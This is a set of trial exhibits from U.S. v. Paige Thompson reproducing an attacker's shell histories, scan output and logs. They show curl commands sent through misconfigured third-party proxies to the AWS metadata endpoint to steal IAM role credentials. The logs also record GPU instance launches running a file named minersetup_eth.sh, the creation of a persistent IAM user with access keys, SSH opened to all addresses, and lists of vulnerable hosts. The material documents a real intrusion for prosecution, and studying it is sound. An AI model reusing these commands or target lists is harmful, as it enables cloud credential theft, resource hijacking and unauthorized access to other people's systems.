```
529    5515  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.161.43.11:443
             http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh`
530    5516  aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] | .InstanceType'
531    5517  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
532    5518  aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
533    5519  aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
534    5520  aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
535    5521  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 3 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
536    5522  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
537    5523  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
538    5524  aws ec2 run-instances --region eu-west-1 --instance-type p2.2xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
539    5525  aws ec2 run-instances --region eu-west-1 --instance-type p2.xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
540    5526  aws ec2 run-instances --region eu-west-1 --instance-type p3.xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
541    5536  aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
542    5537  aws ec2 run-instances --region eu-west-1 --instance-type g3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
543    5538  aws ec2 run-instances --region eu-west-1 --instance-type g3.8xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
544    5539  aws ec2 run-instances --region eu-west-1 --instance-type g3.2xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
545    5540  aws ec2 run-instances --region eu-west-1 --instance-type g3.4xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
546    5541  aws ec2 run-instances --region eu-west-1 --instance-type g3s.xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
             --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
547    5542  aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] | [.InstanceType, .PublicIpAddress]'
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 806
Admitted_____

```
577  # host              -g3.4xlarge-1
578  #    HostName                 34.254.249.212
579  #    User                     ubuntu
580  #    IdentityFile             ~/.ssh/              -eu-west-1.id_rsa
581  #    IdentitiesOnly           yes
582
583  # host              -g3.4xlarge-2
584  #    HostName                 34.251.109.44
585  #    User                     ubuntu
586  #    IdentityFile             ~/.ssh/              -eu-west-1.id_rsa
587  #    IdentitiesOnly           yes
588
589  # host              -g3s.xlarge-1
590  #    HostName                 52.211.167.148
591  #    User                     ubuntu
592  #    IdentityFile             ~/.ssh/              -eu-west-1.id_rsa
593  #    IdentitiesOnly           yes
594
595  # host              -g3s.xlarge-2
596  #    HostName                 54.154.112.182
597  #    User                     ubuntu
598  #    IdentityFile             ~/.ssh/              -eu-west-1.id_rsa
599  #    IdentitiesOnly           yes
600
601  # host              -g3.16xlarge-1
602  #    HostName                 34.243.40.14
603  #    User                     ubuntu
604  #    IdentityFile             ~/.ssh/              -eu-west-1.id_rsa
605  #    IdentitiesOnly           yes
606
```

```
   awsscan.txt
 1   http://52.202.95.84:8181        "InstanceProfileArn" : "arn:aws:iam::         2271:instance-profile/                              ,
 2   http://52.199.114.150:8001      "InstanceProfileArn" : "arn:aws:iam::         3129:instance-profile/
 3   http://52.79.227.180:3000       "InstanceProfileArn" : "arn:aws:iam::         4553:instance-profile/
 4   http://54.200.150.203:8001      "InstanceProfileArn" : "arn:aws:iam::         6390:instance-profile/
 5   http://13.232.127.99:8080       "InstanceProfileArn": "arn:aws:iam::          8947:instance-profile/
 6   http://13.232.127.99:8000       "InstanceProfileArn": "arn:aws:iam::          3509:instance-profile/
 7   https://63.32.127.100:443       "InstanceProfileArn" : "arn:aws:iam::         4053:instance-profile/
 8   https://35.162.65.136:443       "InstanceProfileArn" : "arn:aws:iam::         9784:instance-profile/
 9   http://52.59.198.77:8080        "InstanceProfileArn": "arn:aws:iam::          1617:instance-profile/
10   http://52.59.198.77:8000        "InstanceProfileArn" : "arn:aws:iam::         0020:instance-profile/
11   http://52.72.216.229:8181       "InstanceProfileArn" : "arn:aws:iam::         2271:instance-profile/
12   http://13.52.44.117:80          "InstanceProfileArn" : "arn:aws:iam::         3625:instance-profile/
13   http://52.36.188.73:8088        "InstanceProfileArn" : "arn:aws:iam::         4645:instance-profile/
14   http://54.183.173.34:8080       "InstanceProfileArn": "arn:aws:iam::          6757:instance-profile/
15   http://54.183.173.34:8000       "InstanceProfileArn": "arn:aws:iam::          6098:instance-profile/
16   http://34.210.95.136:3128       "InstanceProfileArn" : "arn:aws:iam::         5156:instance-profile/
17   https://13.52.44.117:443        "InstanceProfileArn" : "arn:aws:iam::         3625:instance-profile/
18   http://34.210.95.136:3129       "InstanceProfileArn" : "arn:aws:iam::         5156:instance-profile/
19   https://54.214.49.137:443       "InstanceProfileArn" : "arn:aws:iam::         5458:instance-profile/
20   http://52.79.116.117:3128       "InstanceProfileArn" : "arn:aws:iam::         5264:instance-profile/
21   http://18.231.1.242:8085        "InstanceProfileArn" : "arn:aws:iam::         7956:instance-profile/
22   http://18.231.1.242:8082        "InstanceProfileArn" : "arn:aws:iam::         7956:instance-profile/
23   http://34.233.83.33:8181        "InstanceProfileArn" : "arn:aws:iam::         2271:instance-profile/
24   http://34.197.158.104:8181      "InstanceProfileArn" : "arn:aws:iam::         2271:instance-profile/
25   http://34.218.113.19:3129       "InstanceProfileArn" : "arn:aws:iam::         5156:instance-profile/
26   http://34.218.113.19:3128       "InstanceProfileArn" : "arn:aws:iam::         5156:instance-profile/
27   http://13.232.182.109:3128      "InstanceProfileArn" : "arn:aws:iam::         8977:instance-profile/
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 807
Admitted_____

aws.commands ❌

```
849    7124  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.52.44.117:80
       http://169.254.169.254/latest/meta-data/iam/security-credentials/                      | awssession.sh`
```



```
host weighttrainer-1
    HostName        54.148.234.88
    User            ubuntu
    IdentityFile    ~/.ssh/weighttrainer.id_rsa
    IdentitiesOnly  yes

host weighttrainer-2
    HostName        34.220.189.209
    User            ubuntu
    IdentityFile    ~/.ssh/weighttrainer.id_rsa
    IdentitiesOnly  yes

host weighttrainer-3
    HostName        34.215.151.134
    User            ubuntu
    IdentityFile    ~/.ssh/weighttrainer.id_rsa
    IdentitiesOnly  yes

host weighttrainer-4
    HostName        34.217.212.132
    User            ubuntu
    IdentityFile    ~/.ssh/weighttrainer.id_rsa
    IdentitiesOnly  yes

host weighttrainer-5
    HostName        52.38.153.12
    User            ubuntu
    IdentityFile    ~/.ssh/weighttrainer.id_rsa
    IdentitiesOnly  yes

host weighttrainer-6
    HostName        54.245.190.196
    User            ubuntu
    IdentityFile    ~/.ssh/weighttrainer.id_rsa
    IdentitiesOnly  yes
```

iam_fulllog.txt ⊠

```
31  http://52.72.216.229:8181    }http://13.52.44.117:80 {
32  http://13.52.44.117:80       "Code" : "Success",
33  http://13.52.44.117:80       "LastUpdated" : "2019-04-19T17:45:12Z",
34  http://13.52.44.117:80       "InstanceProfileArn" : "arn:aws:iam::        3625:instance-profile/
35  http://13.52.44.117:80       "InstanceProfileId" :
36  http://13.52.44.117:80    }http://52.36.188.73:8088    {
37  http://52.36.188.73:8088        "Code" : "Success",
38  http://52.36.188.73:8088        "LastUpdated" : "2019-04-19T17:21:34Z",
39  http://52.36.188.73:8088        "InstanceProfileArn" : "arn:aws:iam::        4645:instance-profile/
40  http://52.36.188.73:8088        "InstanceProfileId" :
41  http://52.36.188.73:8088     }http://52.87.83.135:80 <html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{
42  http://52.87.83.135:80       "Code" : "Success",
43  http://52.87.83.135:80       "LastUpdated" : "2019-04-18T22:26:14Z",
44  http://52.87.83.135:80       "InstanceProfileArn" : "arn:aws:iam::        4528:instance-profile/
45  http://52.87.83.135:80       "InstanceProfileId" :
46  http://52.87.83.135:80    }</pre></body></html>https://13.52.44.117:443    {
47  https://13.52.44.117:443        "Code" : "Success",
48  https://13.52.44.117:443        "LastUpdated" : "2019-04-19T17:45:12Z",
49  https://13.52.44.117:443        "InstanceProfileArn" : "arn:aws:iam::        3625:instance-profile/
50  https://13.52.44.117:443        "InstanceProfileId" :
51  https://13.52.44.117:443     }http://54.183.173.34:8000   {
52  http://54.183.173.34:8000        "InstanceProfileArn": "arn:aws:iam::        6098:instance-profile/
53  http://54.183.173.34:8000        "InstanceProfileId":
54  http://54.183.173.34:8000        "Code": "Success",
55  http://54.183.173.34:8000        "LastUpdated": "2019-34-18T23:34:39Z"
56  http://54.183.173.34:8000     }http://54.183.173.34:8080   {
57  http://54.183.173.34:8080        "InstanceProfileArn": "arn:aws:iam::        6757:instance-profile/
58  http://54.183.173.34:8080        "InstanceProfileId":
59  http://54.183.173.34:8080        "Code": "Success",
60  http://54.183.173.34:8080        "LastUpdated": "2019-34-18T23:34:39Z"
61  http://54.183.173.34:8080     }http://34.210.95.136:3128   {
62  http://34.210.95.136:3128        "Code" : "Success",
63  http://34.210.95.136:3128        "LastUpdated" : "2019-04-19T17:43:42Z",
64  http://34.210.95.136:3128        "InstanceProfileArn" : "arn:aws:iam::        5156:instance-profile/
65  http://34.210.95.136:3128        "InstanceProfileId" :
66  http://34.210.95.136:3128     }http://34.210.95.136:3129   {
67  http://34.210.95.136:3129        "Code" : "Success",
68  http://34.210.95.136:3129        "LastUpdated" : "2019-04-19T17:43:42Z",
69  http://34.210.95.136:3129        "InstanceProfileArn" : "arn:aws:iam::        5156:instance-profile/
70  http://34.210.95.136:3129        "InstanceProfileId" :
```

| | | |
|---|---|---|
| ldap_amazon.txt | | |
| 3145 | https://13.52.44.117:443 | * Rebuilt URL to: ldap.amazon.com:389/ |
| 3146 | https://13.52.44.117:443 | *   Trying 13.52.44.117... |
| 3147 | https://13.52.44.117:443 | * TCP_NODELAY set |
| 3148 | https://13.52.44.117:443 | * Connected to 13.52.44.117 (13.52.44.117) port 443 (#0) |
| 3149 | https://13.52.44.117:443 | } [5 bytes data] |
| 3150 | https://13.52.44.117:443 | * TLSv1.2 (OUT), TLS handshake, Client hello (1): |
| 3151 | https://13.52.44.117:443 | } [167 bytes data] |
| 3152 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Server hello (2): |
| 3153 | https://13.52.44.117:443 | { [93 bytes data] |
| 3154 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Certificate (11): |
| 3155 | https://13.52.44.117:443 | { [4601 bytes data] |
| 3156 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Server key exchange (12): |
| 3157 | https://13.52.44.117:443 | { [300 bytes data] |
| 3158 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Server finished (14): |
| 3159 | https://13.52.44.117:443 | { [4 bytes data] |
| 3160 | https://13.52.44.117:443 | * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): |
| 3161 | https://13.52.44.117:443 | } [37 bytes data] |
| 3162 | https://13.52.44.117:443 | * TLSv1.2 (OUT), TLS change cipher, Client hello (1): |
| 3163 | https://13.52.44.117:443 | } [1 bytes data] |
| 3164 | https://13.52.44.117:443 | * TLSv1.2 (OUT), TLS handshake, Finished (20): |
| 3165 | https://13.52.44.117:443 | } [16 bytes data] |
| 3166 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Finished (20): |
| 3167 | https://13.52.44.117:443 | { [16 bytes data] |
| 3168 | https://13.52.44.117:443 | * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 |
| 3169 | https://13.52.44.117:443 | * Proxy certificate: |
| 3170 | https://13.52.44.117:443 | *  subject: OU=Domain Control Validated; OU=EssentialSSL Wildcard; CN=*. |
| 3171 | https://13.52.44.117:443 | *  start date: Sep 12 00:00:00 2018 GMT |
| 3172 | https://13.52.44.117:443 | *  expire date: Sep 12 23:59:59 2019 GMT |
| 3173 | https://13.52.44.117:443 | *  issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA |
| 3174 | https://13.52.44.117:443 | *  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. |
| 3175 | https://13.52.44.117:443 | * allocate connect buffer! |
| 3176 | https://13.52.44.117:443 | * Establish HTTP proxy tunnel to ldap.amazon.com:389 |
| 3177 | https://13.52.44.117:443 | } [5 bytes data] |
| 3178 | https://13.52.44.117:443 | > CONNECT ldap.amazon.com:389 HTTP/1.1 |
| 3179 | https://13.52.44.117:443 | > Host: ldap.amazon.com:389 |
| 3180 | https://13.52.44.117:443 | > User-Agent: curl/7.60.0 |
| 3181 | https://13.52.44.117:443 | > Proxy-Connection: Keep-Alive |
| 3182 | https://13.52.44.117:443 | > |
| 3183 | https://13.52.44.117:443 | { [5 bytes data] |
| 3184 | https://13.52.44.117:443 | < HTTP/1.1 500 Internal Server Error |
| 3185 | https://13.52.44.117:443 | < Date: Fri, 19 Apr 2019 23:09:17 GMT |
| 3186 | https://13.52.44.117:443 | < Server: Apache/2.4.29 (Ubuntu) |
| 3187 | https://13.52.44.117:443 | < Content-Length: 613 |
| 3188 | https://13.52.44.117:443 | < Connection: close |
| 3189 | https://13.52.44.117:443 | < Content-Type: text/html; charset=iso-8859-1 |
| 3190 | https://13.52.44.117:443 | < |
| 3191 | https://13.52.44.117:443 | * The requested URL returned error: 500 |
| 3192 | https://13.52.44.117:443 | * CONNECT phase completed! |
| 3193 | https://13.52.44.117:443 | * Connection #0 to host 13.52.44.117 left intact |

listbuckets.log

| | | |
|---|---|---|
| 676 | https://3.120.71.226:443 | "CreationDate": "2019-01-28T16:21:24.000Z" |
| 677 | https://3.120.71.226:443 | }, |
| 678 | https://3.120.71.226:443 | { |
| 679 | https://3.120.71.226:443 | "Name": "wepa-logsbucket-73t1warquea2", |
| 680 | https://3.120.71.226:443 | "CreationDate": "2019-01-28T16:22:14.000Z" |
| 681 | https://3.120.71.226:443 | }, |
| 682 | https://3.120.71.226:443 | { |
| 683 | https://3.120.71.226:443 | "Name": "wepa-logsbucket-17x9hjt7zegc", |
| 684 | https://3.120.71.226:443 | "CreationDate": "2019-01-28T16:22:15.000Z" |
| 685 | https://3.120.71.226:443 | }, |
| 686 | https://3.120.71.226:443 | { |
| 687 | https://3.120.71.226:443 | "Name": "wyndham-logsbucket-1360690cvs21u", |
| 688 | https://3.120.71.226:443 | "CreationDate": "2019-01-28T16:22:40.000Z" |
| 689 | https://3.120.71.226:443 | } |
| 690 | https://3.120.71.226:443 | ], |
| 691 | https://3.120.71.226:443 | "Owner": { |
| 692 | https://3.120.71.226:443 | "ID": "844638f154638343daf5373b2ead5a79e3f8a78eb45e7ce8ae1d950e280666c3" |
| 693 | https://3.120.71.226:443 | } |
| 694 | https://3.120.71.226:443 | } |
| 695 | https://54.200.150.203:8001 | ecsInstanceRole |
| 696 | https://54.200.150.203:8001 | |
| 697 | https://54.200.150.203:8001 | An error occurred (AuthorizationHeaderMalformed) when calling the ListBuckets operation: The authorization header is malformed; a non-empty Access Key (AKID) must be provided in the credential. |
| 698 | https://13.52.44.117:80 | |
| 699 | https://13.52.44.117:80 | |
| 700 | https://13.52.44.117:80 | An error occurred (AuthorizationHeaderMalformed) when calling the ListBuckets operation: The authorization header is malformed; a non-empty Access Key (AKID) must be provided in the credential. |
| 701 | http://13.232.182.109:3128 | Ec2-S3-in-window |

mega_metadata.txt

```
629        ../metadata_old/18.208.62.195.metadata.443:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 808
Admitted_____

11-3-19.443.log

```
743  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/info
744  {
745    "Code" : "Success",
746    "LastUpdated" : "2019-03-12T04:35:09Z",
747    "InstanceProfileArn" : "arn:aws:iam::          7507:instance-profile/
748    "InstanceProfileId" :
```



```
aws.commands
145   971  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh
146   973  aws ec2 create-key-pair --region eu-west-2
147   977  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-                        --associate-public-ip-address --security-group-ids sg-9c32cef5 --instance-initiated-shutdown-behavior terminate
           --key-name default --user-data file://minersetup_eth.sh
148   978  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id                        --associate-public-ip-address --security-group-ids sg-9c32cef5 --instance-initiated-shutdown-behavior terminate
           --key-name default --user-data file://minersetup_eth.sh
149   981  aws ec2 authorize-security-group-ingress --group-id sg-9c32cef5 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-1
150   982  aws ec2 authorize-security-group-ingress --group-id sg-9c32cef5 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-2
```

aws commands ☒

```
950    7193   eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/    | awssession.sh`
```

808-004

```
aws commands

1022   7635   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
1023   7636   aws iam create-user --user-name default
1024   7637   aws iam create-access-key --user-name default\n
1025   7638   aws iam put-user-policy --user-name default --policy-name DefaultPolicy --policy-document file:///mnt/export2/DefaultPolicy\n
1026   7639   aws iam list-users
1027   7640   aws --profile           iam list-users
1028   7641   nano ~/.aws/credentials
1029   7642   aws --profile protectionprod iam list-users
1030   7643   aws --profile protectionprod iam list-buckets
1031   7644   aws --profile protectionprod s3api list-buckets
1032   7645   aws organizations
1033   7646   aws organizations describe-account
1034   7647   aws organizations describe-organization
1035   7648   aws admin describe-organization
1036   7649   aws --profile admin organizations describe-organization
1037   7650   aws --profile protectionprod organizations describe-organization
1038   7651   aws --profile astem organizations describe-organization
1039   7652   aws --profile default ec2service s3api list-buckets
1040   7653   aws           s3api list-buckets
1041   7654   aws --profile default s3api list-buckets
```

notes2

```
1   hit this before
2   https://18.208.62.195:443          {
3   https://18.208.62.195:443              "Code" : "Success",
4   https://18.208.62.195:443              "LastUpdated" : "2019-04-18T02:57:11Z",
5   https://18.208.62.195:443              "InstanceProfileArn" : "arn:aws:iam::         7507:instance-
6   https://18.208.62.195:443              "InstanceProfileId" :
7
```

notes2

```
88
89    Another unfixed previously used account
90    eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
91
92    An error occurred (InvalidKeyPair.Duplicate) when calling the CreateKeyPair operation: The keypair 'default' already exists.
93
```

**mega_metadata.txt** ❎

```
364    ../metadata_old/52.48.80.230.metadata.443:ami-id
365    ../metadata_old/52.41.122.83.metadata.443:ami-id
366    ../metadata_old/3.16.148.71.metadata.8081:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 809
Admitted_____

⊟ 7-03-19.443.log ☒

```
      http://169.254.169.254/latest/meta-data/iam/info
119   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443
      http://169.254.169.254/latest/meta-data/iam/info
120   {
121     "Code" : "Success",
122     "LastUpdated" : "2019-03-08T04:41:53Z",
123     "InstanceProfileArn" : "arn:aws:iam::        2642:instance-profile/
124     "InstanceProfileId" :
                                                                                    . .
```

809-002

11-3-19.443.log ☒

```
      http://169.254.169.254/latest/meta-data/iam/info
152   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443
      http://169.254.169.254/latest/meta-data/iam/info
153   {
154     "Code" : "Success",
155     "LastUpdated" : "2019-03-12T04:41:19Z",
156     "InstanceProfileArn" : "arn:aws:iam::          2642:instance-profile/
157     "InstanceProfileId" :
```

```
aws.commands

 2   26  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/        awssession.sh
 3   28  aws ec2 describe-instances --region eu-north-1
 4   29  aws ec2 terminate-instances --instance-ids i-0d750886a37bc58fe --region eu-north-1
 5   30  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-5e9c1520 --key-name default --subnet-id subnet-f5b3b08d --associate-public-ip-address --security-group-ids sg-34d53f5d
 6   31  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-5e9c1520 --key-name default  --associate-public-ip-address --security-group-ids sg-34d53f5d
 7   32  aws ec2 describe-security-groups --region eu-west2
 8   33  aws ec2 create-key-pair --key-name default --region eu-west-2
 9   39  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
10   40  aws ec2 authorize-security-group-ingress --group-id sg-7e56b917 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-2 --region eu-west-2
11   41  ls /home/erratic/aws_scan/.ssh/eu-west-2.id_rsa
12   47  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
13   50  aws ec2 run-instances --region eu-west-2 --instance-type p3.2xlarge --count 1 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
14   51  aws ec2 describe-instances --region eu-west-2 |less
15   53  aws ec2 describe-instances --region eu-west-2 | grep IPAddress
16   54  aws ec2 describe-instances --region eu-west-2 | grep IpAddress
17   78  aws ec2 terminate-instances --instance-id i-08971fdb6787e9c66
18   79  aws ec2 terminate-instances --instance-id i-08971fdb6787e9c66  --region us-west-2
19   80  aws ec2 describe-instances --region eu-west-2 | jq -r '.Reservations | .[] | .Instances | .[] | .InstanceId' | parallel aws ec2 modify-instance-attribute --instance-id {} --instance-initiated-shutdown-behavior terminate --region
         eu-west-2
20   82  aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id ami-005bdb005fb00e791 --key-name default  --associate-public-ip-address --security-group-ids sg-0d2c65751b2642544
21  102  aws ec2 create-key-pair --region us-west-2 --key-name
22  105  aws ec2 terminate-instances --instance-ids i-0bd2fed6a6e7f7e41
23  106  aws ec2 terminate-instances --instance-ids i-0bd2fed6a6e7f7e41 --region us-west-2
24  107  aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id ami-005bdb005fb00e791 --key-name _  --associate-public-ip-address --security-group-ids sg-0d2c65751b2642544
         --instance-initiated-shutdown-behavior terminate
```

809-004

```
aws.commands
124   925  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh
125   927  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate
           --user-data file://minersetup_eth.sh
126   928  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
           --user-data file://minersetup_eth.sh --key-name default
127   930  aws ec2 describe-security-groups --group-ids sg-7e56b917
128   931  aws ec2 describe-security-groups --group-ids sg-7e56b917 --region eu-west-2
129   941  aws ec2 modify-instance-attribute --instance-ids i-09a54ea0fa4d3b027 --user-data ""
130   942  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data "" --region eu-west-2
131   943  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="" --region eu-west-2
132   944  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data file:///dev/null --region eu-west-2
133   945  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="{}" --region eu-west-2
134   946  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="{}" --region eu-west-2
135   947  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data='{"value": ""}' --region eu-west-2
136   948  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data='{"value": "none"}' --region eu-west-2
137   949  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data='{"Value": ""}' --region eu-west-2
138   950  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
           --user-data --key-name default
139   951  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
           --key-name default
```

mega_metadata.txt ✖

```
300    ../metadata_old/34.239.113.195.metadata.443:ami-id
301    ../metadata_old/18.191.157.180.metadata.80:ami-id
302    ../metadata_old/52.212.49.160.metadata.82:ami-id
303    ../metadata_old/52.220.58.82.metadata.81:ami-id
304    ../metadata_old/52.56.232.56.metadata.443:ami-id
305    ../metadata_old/18.234.97.18.metadata.443:ami-id
306    ../metadata_old/18.213.111.76.metadata.443:ami-id
307    ../metadata_old/35.182.34.198.metadata.808:ami-id
308    ../metadata_old/52.76.48.213.metadata.443:ami-id
309    ../metadata_old/3.121.200.114.metadata.443:ami-id
310    ../metadata_old/54.173.210.136.metadata.443:ami-id
311    ../metadata_old/52.64.158.166.metadata.80:ami-id
312    ../metadata_old/13.113.12.133.metadata.80:ami-id
313    ../metadata_old/35.153.226.225.metadata.80:ami-id
314    ../metadata_old/18.217.40.206.metadata.8001:ami-id
315    ../metadata_old/122.248.239.99.metadata.443:ami-id
316    ../metadata_old/107.23.48.26.metadata.443:ami-id
317    ../metadata_old/54.234.236.194.metadata.80:ami-id
318    ../metadata_old/13.251.146.92.metadata.443:ami-id
319    ../metadata_old/54.166.183.10.metadata.3128:ami-id
320    ../metadata_old/52.78.213.1.metadata.8888:ami-id
321    ../metadata_old/54.84.204.162.metadata.443:ami-id
322    ../metadata_old/34.220.181.209.metadata.3128:ami-id
323    ../metadata_old/54.232.248.219.metadata.443:ami-id
324    ../metadata_old/35.169.98.216.metadata.8443:ami-id
325    ../metadata_old/18.209.225.93.metadata.80:ami-id
326    ../metadata_old/34.227.67.245.metadata.3128:ami-id
327    ../metadata_old/54.80.21.207.metadata.3128:ami-id
328    ../metadata_old/35.154.211.231.metadata.443:ami-id
329    ../metadata_old/34.196.59.204.metadata.8888:ami-id
330    ../metadata_old/18.225.10.207.metadata.80:ami-id
331    ../metadata_old/18.204.247.252.metadata.443:ami-id
332    ../metadata_old/63.34.213.125.metadata.443:ami-id
333    ../metadata_old/34.239.93.133.metadata.443:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 810
Admitted_____

aws.commands ☒

| 832 | 7035 | curl `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.113.12.133:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ | awssession.sh` |
| 833 | 7036 | aws ec2 describe-instances --region ap-northeast-2 |
